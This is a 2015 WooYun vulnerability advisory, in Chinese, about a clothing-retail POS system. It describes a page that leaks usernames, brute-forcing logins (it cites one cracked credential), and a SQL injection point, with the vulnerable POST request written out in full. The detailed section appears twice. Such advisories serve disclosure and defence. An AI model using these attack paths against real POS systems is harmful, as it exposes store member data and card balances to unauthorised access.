当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155657

漏洞标题:依友POS系统登陆信息泄露及sql注入

相关厂商:杭州达罗尼科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-25 06:38

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

依友POS系统登陆信息泄露及sql注入

详细说明:

“YEU依友软件”是杭州达罗尼科技有限公司旗下的软件产品品牌。
“YEU依友软件”系列产品是针对服装行业信息化建设的软件产品,特别适合产销一体的品牌企业,产品涵盖了从产品企划-产前-原料-计划-生产-物流-网商-分销-终端-全国营运的整个产业链及各业务管理细节;是唯一一家针对杭州女装企业特色,具有流程规范、KPI管控,操作简便又不失丰富功能的行业ERP软件,适合解决企业快速、多变、灵活、创新模式下的各种应用模式。总公司位于中国女装之都-杭州。达罗尼科技公司成立于2009年,由十几位有多年服装行业从业经验、精通营运管理及服装业信息化运用的专业人士创建。大家怀着同一梦想,不断学习和创新,将行业营运管理和计算机信息技术相结合,致力于中国服装品牌的崛起,以及推动服装行业的信息化管理进程。公司在短短三年多的时间里,员工数量达到70多人,并已在武汉、郑州成立分公司,客户总量已超过500家,成为服装行业一家新兴的集软件产品、信息化实施及行业咨询的企业。
EPOS系统是基于C#.NET + Jquery + Sql Server技术开发,主要适用于服装门店,以解决门店销售收银管理、库存管理、会员管理、财务管理、商品成本、销售库存分析、店务工作管理的一套系统。

屏幕快照 2015-11-24 21.57.26.png


EPOS系统地址举例:
**.**.**.**:8088/
http://**.**.**.**/pos/
http://**.**.**.**:8088/
http://**.**.**.**:8088/
http://**.**.**.**:8888/
漏洞详情:
1:用户名列表泄露,且系统无验证码,可暴力破解登陆。
用户名泄露地址:/Code/System/FunRepManage/SelFunOper.aspx?rid=xxxx(四位数字即可,通常0001、0002即可)
举例:http://**.**.**.**:8888/Code/System/FunRepManage/SelFunOper.aspx?rid=0001

屏幕快照 2015-11-24 22.04.08.png


**.**.**.**:8088//Code/System/FunRepManage/SelFunOper.aspx?rid=0001

屏幕快照 2015-11-24 22.06.12.png


泄露的信息包括userid及用户名(URL编码)。
既然有了用户名,并且无验证码及次数限制,暴力破解登陆系统
http://**.**.**.**:8888(9075/123456)

屏幕快照 2015-11-24 22.10.43.png


会员信息:

屏幕快照 2015-11-24 22.12.44.png


并可对会员卡、金额操作等。
2:sql注入
http://**.**.**.**:8888/DoCity.aspx post类型,参数:__CALLBACKPARAM

POST /DoCity.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**:8888/DoCity.aspx
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: **.**.**.**:8888
Content-Length: 207
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=vsblcoafqmfb4b55sim3up45; cod=0106.0110.0115.0125.0130.0175.0180.0190.011050.011060.011510.011520.011530.011540; csd=019099
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0NDQxNzQ1ODFkZIaFgkAqtYpxJZGlu6K5CvbimsCI&=%E6%9C%AA%E9%80%89%E6%8B%A9&=%E6%9C%AA%E9%80%89%E6%8B%A9&__CALLBACKID=__Page&__CALLBACKPARAM=411


屏幕快照 2015-11-24 22.15.08.png


存在的库及当前库:

屏幕快照 2015-11-24 22.16.08.png


屏幕快照 2015-11-24 22.16.48.png


当前库存在的表:

屏幕快照 2015-11-24 22.17.31.png

漏洞证明:

“YEU依友软件”是杭州达罗尼科技有限公司旗下的软件产品品牌。
“YEU依友软件”系列产品是针对服装行业信息化建设的软件产品,特别适合产销一体的品牌企业,产品涵盖了从产品企划-产前-原料-计划-生产-物流-网商-分销-终端-全国营运的整个产业链及各业务管理细节;是唯一一家针对杭州女装企业特色,具有流程规范、KPI管控,操作简便又不失丰富功能的行业ERP软件,适合解决企业快速、多变、灵活、创新模式下的各种应用模式。总公司位于中国女装之都-杭州。达罗尼科技公司成立于2009年,由十几位有多年服装行业从业经验、精通营运管理及服装业信息化运用的专业人士创建。大家怀着同一梦想,不断学习和创新,将行业营运管理和计算机信息技术相结合,致力于中国服装品牌的崛起,以及推动服装行业的信息化管理进程。公司在短短三年多的时间里,员工数量达到70多人,并已在武汉、郑州成立分公司,客户总量已超过500家,成为服装行业一家新兴的集软件产品、信息化实施及行业咨询的企业。
EPOS系统是基于C#.NET + Jquery + Sql Server技术开发,主要适用于服装门店,以解决门店销售收银管理、库存管理、会员管理、财务管理、商品成本、销售库存分析、店务工作管理的一套系统。

屏幕快照 2015-11-24 21.57.26.png


EPOS系统地址举例:
**.**.**.**:8088/
http://**.**.**.**/pos/
http://**.**.**.**:8088/
http://**.**.**.**:8088/
http://**.**.**.**:8888/
漏洞详情:
1:用户名列表泄露,且系统无验证码,可暴力破解登陆。
用户名泄露地址:/Code/System/FunRepManage/SelFunOper.aspx?rid=xxxx(四位数字即可,通常0001、0002即可)
举例:http://**.**.**.**:8888/Code/System/FunRepManage/SelFunOper.aspx?rid=0001

屏幕快照 2015-11-24 22.04.08.png


**.**.**.**:8088//Code/System/FunRepManage/SelFunOper.aspx?rid=0001

屏幕快照 2015-11-24 22.06.12.png


泄露的信息包括userid及用户名(URL编码)。
既然有了用户名,并且无验证码及次数限制,暴力破解登陆系统
http://**.**.**.**:8888(9075/123456)

屏幕快照 2015-11-24 22.10.43.png


会员信息:

屏幕快照 2015-11-24 22.12.44.png


并可对会员卡、金额操作等。
2:sql注入
http://**.**.**.**:8888/DoCity.aspx post类型,参数:__CALLBACKPARAM

POST /DoCity.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**:8888/DoCity.aspx
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: **.**.**.**:8888
Content-Length: 207
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=vsblcoafqmfb4b55sim3up45; cod=0106.0110.0115.0125.0130.0175.0180.0190.011050.011060.011510.011520.011530.011540; csd=019099
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0NDQxNzQ1ODFkZIaFgkAqtYpxJZGlu6K5CvbimsCI&=%E6%9C%AA%E9%80%89%E6%8B%A9&=%E6%9C%AA%E9%80%89%E6%8B%A9&__CALLBACKID=__Page&__CALLBACKPARAM=411


屏幕快照 2015-11-24 22.15.08.png


存在的库及当前库:

屏幕快照 2015-11-24 22.16.08.png


屏幕快照 2015-11-24 22.16.48.png


当前库存在的表:

屏幕快照 2015-11-24 22.17.31.png

修复方案:

你们懂得

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝